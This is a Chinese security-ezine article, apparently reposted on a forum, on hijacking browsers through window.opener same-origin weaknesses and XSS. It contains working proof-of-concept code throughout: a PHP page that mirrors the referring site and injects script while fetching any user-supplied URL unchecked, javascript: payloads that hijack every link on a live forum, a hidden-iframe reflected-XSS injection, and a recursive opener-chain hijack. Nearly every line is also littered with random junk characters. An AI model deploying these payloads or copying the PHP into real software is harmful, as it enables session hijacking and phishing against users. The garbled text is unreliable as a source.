==Ph4nt0m Security Team==
( i- b* b7 d& U
+ V/ {/ u7 U3 y1 s Issue 0x03, Phile #0x05 of 0x07
" u+ L& P( t0 R1 v* `7 h 1 c. B$ X2 }9 n
0 E$ m# g! l$ I, T
|=---------------------------------------------------------------------------=|
) ]( t$ S/ L+ K4 {3 q2 W! Q|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|
/ i8 t' P- G! U|=---------------------------------------------------------------------------=|8 E0 x% a9 W" p) s
|=---------------------------------------------------------------------------=|6 m* p4 o$ d( } [9 w
|=------------------------=[ By rayh4c ]=---------------------------=|
{1 u# h4 s% G9 F|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
2 g, j2 Y# w6 Z- e+ x) I|=---------------------------------------------------------------------------=|( F9 j& M/ S# f) j5 ?9 l
8 B2 Z- }: u/ _ ]1 h0 y
5 N* r+ b- \$ Z8 _/ q$ Z
[目录]
5 v9 ~1 B& a" [9 l$ ^7 {
5 D' F) G6 F& D- ], M; w- ?+ c! }7 _1. 前言
, e$ [- \0 F& k2 O; g: j. y2 l2. 同源策略简叙# I& _ T# e' g B
3. 理解window对象的同源策略
1 s4 @6 C) Q( R5 ]3 D i' y# }4. 窗口引用功能中的同源策略漏洞
5 ^; e0 f, M0 v8 `, z 4.1 父窗口引用子窗口的同源策略问题4 W2 B' b( r# \8 ?" ^( l, \
4.2 子窗口引用父窗口的同源策略问题
* X4 A0 \! _# z: ]: ?8 \( @5. 利用窗口引用漏洞劫持浏览器( ^ `# C6 L( l
6. 利用XSS漏洞劫持浏览器
' J6 e% \0 Y4 a, C! s2 N: ? 6.1 正向跨窗口劫持
9 T, W, z" S% ]; f0 Q* r 6.2 反向跨窗口劫持8 X* f/ B9 [0 Y! B6 [
6.3 极度危险的跨框架窗口引用劫持4 t: q% z7 M$ f2 K. Q$ F! m
6.4 极度危险的正反向跨窗口递归劫持
) j# ~% i3 ]8 p 6.5 完全控制浏览器
! j4 M; ^& }4 h7. 后记
& b% l1 H) Y$ \9 X9 c6 d8. 参考
9 _0 {+ g) e5 ]8 k& k( O+ R% K% L& t( `$ m
- V+ z" \9 X0 f0 L: V一、前言$ m1 C8 L" U9 g) |0 c
! P5 q+ `+ a8 E6 I4 |# f- p
最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋
8 n3 v# p5 h J$ M9 D6 F# e9 @友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session
& q) r9 f! c5 q+ n劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被
: P J8 {+ y; K* [: n( ^条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。
5 ]9 S+ j$ j2 u4 i7 @6 B" x1 L: i7 S% N9 U( p
2 r0 \4 U4 e" o
二、同源策略简叙
9 }% S9 Z- J6 v) D( q- z0 S- [; V
& ~: W" y5 a+ p& U: g 同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以
+ R; p5 n4 B% Z8 `' n9 w1 h0 E2 O从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都
; I. @$ ]9 ]( m7 a2 U曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木
; `5 c7 H& b. c$ { ?' H马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个2 `5 u( l- r3 V9 w/ g% J; n- j
漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。' I2 v9 O: V S1 ~- v" S
% S6 w1 z8 C: o; \- n/ h( ]# J/ H
三、理解window对象的同源策略3 v/ m, `; o, ~9 v& `: g$ }5 H, t
7 Z. H9 j0 |/ e" i6 c# i, x 窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对2 E( a1 |5 x+ W
象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:6 o/ X% H% {( B2 t* y1 i: \
: F. B9 k, N% Z8 c/ Z& w
--code-------------------------------------------------------------------------
8 B) H j8 m3 H3 Q% `; v) L( V( i<script language="javascript">
/ l5 [, j. }9 p8 ufor(p in window) document.write(p+"<br>");9 v) G$ F' a. @2 k
</script># [* Y! Z X0 X8 x
-------------------------------------------------------------------------------" t1 W5 d1 l; A% b
1 ^! s6 [( x1 z. O# N
这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方5 }5 S6 ^- O. _0 c
法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,3 Z- V m, D8 v8 }' t
这些属性和方法就必须遵循同源策略。! `4 U2 r( V& G! Q0 y3 x
! H# {7 H: K# Z
举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那# s) _9 N, p6 f' g
么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须
3 e) `7 ^( t K: U+ s' s的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这
1 x, ] T" p) U4 V* b1 ]' A. s: W个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的
+ b/ ^/ E; T' Y+ I" u6 }+ W" B值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location' ~+ @0 j/ H( p& W( R
属性并没有被拒绝访问。
# Z' x& c5 R. v+ p0 o2 e3 U
! l/ a) u6 U0 t5 f* O, u/ Z, o" C7 p--demo.html--------------------------------------------------------------------6 n2 v! v/ {' w4 R: {% S2 M! c' W
<script language="javascript">
4 Y# r% F4 { e) [5 ?: Ifunction allPrpos(obj) {
: u3 l- Q, f8 e- J1 l var props = "<table><tr><td>名称</td><td>值</td>"; 2 r( L, [* H! k' H2 s2 I4 [4 d
for(var p in obj){ 0 I O, }7 P' ^
if(typeof(obj[p])=="function"){ # J+ P" D3 w* `( |
obj[p]();
* ]+ s, U! p! j8 K }else{ * g) Q* @" c: k
try " N5 u3 p y/ o5 p
{
# @* l j( `7 ^/ E& ~7 w. j props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>";
3 g) z b x# E" H } $ [& B! n: {2 p3 _6 r8 g: D
catch (ex) 1 F2 I6 O% X% _( V0 }. v: V; V1 k
{
! y# ~* P7 M! p2 \" r i5 l
+ f. `9 r8 M5 D, f9 M9 A2 v props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>";
" L) r) ~( \0 C' T( W4 L }
( J/ ?+ O! `' l" l: n ! g$ R6 E- M" ]+ c* `1 W
} 6 J1 y" x/ u* T7 w$ ?
} : [6 C) j r9 H
`6 {, ?' j1 d! r3 j document.write(props+"</table>"); & y, ^" ?( ~9 M: ?, ]
} * Z8 [9 F+ J0 d) N
1 W" V0 L0 p3 u: e' g3 c8 m. y4 w+ M
function createWin() {* v0 s) P4 ]' e% |- \, L+ D
newWin = window.open ("http://www.google.com");
9 D) b4 p1 Q- _( e" J$ r. X setTimeout(function(){allPrpos(newWin)},2000);
/ w7 t! M7 x+ ?" s. a; {8 Q9 O}
3 F) S9 R: F4 b8 ]6 d
- }: ~' t. r8 H$ v</script> 3 C8 H) D3 }# l! B9 c' J$ D# E r3 b
( |& C/ s3 u \. O0 P! m3 B
<button onclick='createWin()'>创建一个非同源子窗口测试</button>
6 Z1 f% v. ?6 M/ m3 `-------------------------------------------------------------------------------
2 H% b, n9 }6 @ g& T7 C, I, i: J. c- i6 o) ]$ h
# L l6 M6 @0 ^
四、窗口引用功能中的同源策略漏洞5 K- Y6 M2 ^1 S9 e2 ?
) y. ?# w. |5 t- B; S: L4.1 父窗口引用子窗口的同源策略问题
+ g$ L; T% K) x0 i: D; d) s. {" _
$ ` G+ S6 Z2 X' r7 X: b3 S 去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复,
+ R3 D8 u) J( `/ _$ N" ^ k& Q但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道
, E* u" H2 z& }# }3 K浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进
. a5 B: Q# ]/ v+ e( r$ ~- E行测试,会发现父窗口可以控制非同源子窗口location属性值。7 B4 C7 T0 }+ F4 g6 t' ~# V# ^" a
2 J* y2 E: m6 A1 ^* P
--vul1.html--------------------------------------------------------------------
# r5 G) a1 t. L<script language="javascript"> 0 m& a# W9 x% Y0 x% R
function createWin() { : P0 S' i) k# k5 J
newWin = window.open ("http://www.google.com"); : g( ?: l. c1 r1 w! l, L+ z" Q
setTimeout(function(){newWin.location="http://www.80sec.com"},2000);
* e1 @& B; e5 b2 ] Y; z" N} 4 g/ e' J) O4 P2 s( W/ f$ x
</script>! _0 Q7 E# d$ N* H! E3 a- m+ \
; o( \' S ~# O1 V<button onclick='createWin()'>创建一个非同源子窗口测试</button>8 A1 z" p6 H6 N& j1 R* y
-------------------------------------------------------------------------------0 }" g# V z9 F) N: Y' r. j O
9 R1 H& z# y" d( Z/ B
8 a2 \ C- Z3 R0 y8 g6 P4.2 子窗口引用父窗口的同源策略问题
5 c* V9 g. `7 O Q& i+ j5 t g w; p1 h$ F9 O- a( N
逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使8 ?8 w* s/ \; j+ F, y* k
用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们
! n/ k6 n- x- Y# g/ ~: s+ n可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定% ]* b/ D% F8 X) q) O. U5 }( w9 d
会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。' n' J7 x9 o. X$ E4 k: [
( n' [2 l3 \* F6 e+ m/ r--code-------------------------------------------------------------------------2 b* t1 X# ^: h0 U# \
' {; n5 o* B3 _0 _& Rjavascript:window.opener.location = "http://www.80sec.com";void(0);, d& W S" s; a$ }3 y4 G, K. v
% n! L9 F& M& u$ o
-------------------------------------------------------------------------------7 o, C* D- v0 d' N% R% e
+ B" }4 t6 Q' c0 _7 C8 H- g* r4 G# |
五、利用窗口引用漏洞劫持浏览器9 @: r5 g& E, C; _4 t4 K$ K# w- u2 s
8 p. c' r- O2 V, x2 I9 k
经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子
9 G2 H0 q3 Z: {! M! R, J# `; m窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那5 k; \8 U7 t6 q; m* r
么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。
$ ?/ S; b) T+ d- L2 D' [8 M. s& D# h3 k; ^
我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产
% G. d" |. E# e* \( U- G生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或
/ K% A. E- V) b# Y) }+ P者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接7 J3 r. h- R2 ^ [- G4 [
后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下
$ J( i& T% n" X$ X0 _2 e" ^会产生什么可怕的后果。$ I" C9 f& i: W# i: ?" u- [
6 W, P9 i1 T4 a+ }. s
下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我
" R$ X/ X# g3 @" E n5 A+ _们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php
& }1 ` T" Z1 M/ k这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时3 O/ K: {+ A- Q5 t" I" y. E W
候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可6 H' t9 N! j4 p* K
以做更多的事情,所有的一切仅仅是因为点击了一个链接。
7 Z, {+ D/ ?2 T6 t3 h$ }/ S6 Y) D) W9 \% ^
--hjk_ref.php------------------------------------------------------------------
0 Z" F/ Q. Y" ^% N6 J3 ?<?php
7 O0 v6 u+ ?0 `# T" _+ dif (array_key_exists("HTTP_REFERER", $_SERVER)) {; ^4 h; m$ G% U$ \& e6 V5 \- |1 `. D! ~
$Url_Mirror = $_SERVER["HTTP_REFERER"];
& g4 U1 ?8 t+ Q$ J9 ^6 c} , F' _/ |) d2 y* S1 }3 s4 A8 S
if(isset ($_GET['ref'])) {* v8 L3 g; b$ k! _" \
echo file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';# Y/ W9 W- B/ @+ w* \
}, r. ]; r" g' g- P ^
?>
: P6 u3 Z7 l0 t# G1 g9 w$ M. h; N5 V/ N$ f r: V) ^1 n
<script language="javascript">
% f& L. ~8 v' w2 Y+ psetTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000);
+ U1 Y4 x- U5 N: K! s- p& [</script>2 c5 e& V+ ~ @4 `1 Y6 Z
-------------------------------------------------------------------------------
4 `9 \( |8 H/ J' L" f7 W- Z& ]: U4 m! t4 L0 q
注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。
+ c) |2 a( h2 O2 G2 f
2 P8 x/ Y# J" s& f4 B
4 g5 d; J3 \" n$ w' [8 f$ J, u六、利用XSS漏洞劫持浏览器
3 E% u0 l( ^$ Y/ s8 z" |8 e4 X1 I2 E1 z6 p6 B0 {$ k
延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为- N+ w& u! y# O' A2 ?, F7 i1 a4 n! m
持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后- Y3 C% s) @9 o, f
XSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起) l& @ N8 `" M
讨论跨站师的终极技巧:
; @; c5 I3 ^, p7 h$ U* K/ f
1 B+ D. o% `0 f6 ]( U- p+ J. x
2 l1 g8 M! o' W' W4 ~5 H6.1 正向跨窗口劫持
+ r9 @& ~' W- }7 G
9 |( U6 k9 I' A/ Z! \9 k 大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛2 q0 X# q8 r. \4 p
主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链
$ C; i5 n" b$ B! z: h接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话: M4 s! h4 }& D
框脚本。
; Y1 {( ?; m6 y
7 W: r, o: c- E, Y. ~--hijack_open.js---------------------------------------------------------------9 f9 W _+ l/ m$ H3 h9 ^1 z; [
2 d" c& L. G2 |, r5 j2 z9 @javascript:for(i=0;i<document.links.length;i++){document.links.onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);4 d3 ]6 }; C+ l, Z
! k0 B, B! J6 F9 K$ |-------------------------------------------------------------------------------6 J, |4 j5 m& w+ ~6 u& P @7 x8 V
n _2 ^5 \: f/ a1 f# E+ m2 M
& j3 P& k. [7 ^2 I# L& j$ w
6.2 反向跨窗口劫持
o9 p$ U u2 b" y& i: Q8 A) B" W* e5 ~- h5 M2 k8 O0 N
同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代
+ [ p, V9 U+ H码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话
& c* `7 B8 U3 U$ \1 n) |框脚本。
L5 b: k8 T, ]7 c5 _) Z3 y
0 w# S+ y5 u# C8 D- E--hijack_opener.js-------------------------------------------------------------
& I6 `; S; H- Q5 n# C9 M" w5 B B5 ^, \7 Q& O! R+ J( ~- \; o
javascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);, |: s. C! `& D" e
& m% C- w, r( g, a-------------------------------------------------------------------------------
( i0 \0 q* I: L$ B& x
$ j7 T8 M/ Z4 i5 _& q
, c/ A, D8 c9 P [4 p6.3 极度危险的跨框架窗口引用劫持
% r6 e* z4 Y8 W
6 I% d; E) p9 H5 a' k$ a5 B' b 非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞
# J% q" |1 L/ X# V可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就
5 l% v4 t8 V! k L* p. b# r+ f; p适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个
5 c2 U# f+ N7 C% H: F. ~2 A! {) R非持久型的XSS,如下:
' a7 Z6 g! i* g0 U- b+ E$ ~6 P1 {) @
<iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>
. E5 F& `* W9 g* p. r% ~) v
! E+ q& ?3 h1 W! l$ _ 在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口
! h/ W' p( X, S4 p( N注入脚本。
3 ~$ }0 ] R' _6 a. f$ c* e" N, E2 @
--hijack_frame_opener.js-------------------------------------------------------8 {( c0 Y6 P* P: h! X0 W6 N# b3 o
<script>: ]3 M% z% y! S8 V
window.parent.opener.location="javascript:alert('I had been hijacking your browser!')";
; R g9 _5 A9 \0 {' l# F4 ]; p</script>" d w+ s6 Y4 B7 A: b. d" q
-------------------------------------------------------------------------------* R- x' |8 j4 B3 g# a
" n( H* }/ u; g4 _6 F; C
( b; j8 u3 I1 j$ E+ U, c6.4 极度危险的正反向跨窗口递归劫持
: f1 N- F6 v/ E' n# d1 p3 I' N r7 M a) R6 n# X H
luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window
7 e! `+ [! T5 I6 r9 B/ L2 ~的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过2 [. C+ W& K3 N: r" o& J
异常处理规避之间跨域页面的访问异常,代码如下:
7 g+ m, ?: K, Y& |" `
0 f* [! B" j( R" E--code-------------------------------------------------------------------------
/ Z' F) @5 U- E7 v2 [! y$ U) t, D! u) Y& u
javascript function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);
2 r0 y6 e4 _3 s" T
9 s+ [; E/ ~; o% G! @" | }-------------------------------------------------------------------------------
+ u6 A6 ^3 n @$ ?) @$ q, }9 I/ f1 E$ B3 v! @
假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可
# x% e3 J7 w, N1 c以劫持B域之前的A域页面,从而实现“隔空打击”。
! v6 t" M7 ~5 l( F
4 e+ k) m4 ]* C- }; {2 r1 v) d: e 同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面5 [9 ~7 I( G E; {9 K& Q r) O
执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。, \1 l" O7 K& N/ n$ p, M
9 G! V \5 x* {# D0 w
结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。' T) K) x0 u- S9 c& p
% p) p9 G- ]! H9 J$ v6 T( _% ]' [' B/ a" t
6.5 完全控制浏览器
5 a2 N0 P! Q9 S$ _! v, r4 U, d, v- s
一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则: ]% F s9 F% q2 J3 S( t
是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS
/ c4 j' l( N4 O- i( @# d漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失( k- }; j$ k v) g
而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再$ g3 P8 ^3 \' M5 |
列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站6 x* u& Q2 B, p9 Q8 c
师的终极目标 - 完全控制浏览器。5 P& }2 O. X1 j
) I7 @( f* H: y3 ?
+ ?1 M) R) O( G七、后记
* i. n' a% I% V0 n2 g5 y
& }3 c! z7 ^6 k$ H1 s# b1 @ 文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全
) ?% i1 [, v8 x6 I4 O与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予: o8 c F6 a5 a
过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。* S; }/ S( f) V4 m/ ?5 G
6 W% p4 N, L1 @( L, a! x
6 S3 k' O! T3 E7 R* X, M八、参考/ R# ] ^ w( T
/ I' I' K v' f% @% j' I# W
1. http://en.wikipedia.org/wiki/Same_origin_policy+ w Z _+ H3 v+ }
2. http://code.google.com/p/browser ... licy_for_DOM_access; R, ?: q" t5 F" V
3. http://www.w3.org/TR/Window/
) `, c( @1 e$ Z4. http://www.80sec.com/release/browser-hijacking.txt1 {8 p- i( u' O( m3 m' g
5. http://www.80sec.com/all-browser-security-alert.html
1 F% ^8 b9 y6 X" P, j0 T: J% d6. http://www.80sec.com/ms08-058-attacks-google.html p7 |' w7 q% U, [
, c) _" q& m% D3 b8 l7 T' M6 L
-EOF- |
发表于 2012-9-13 17:10:56
收藏
支持
反对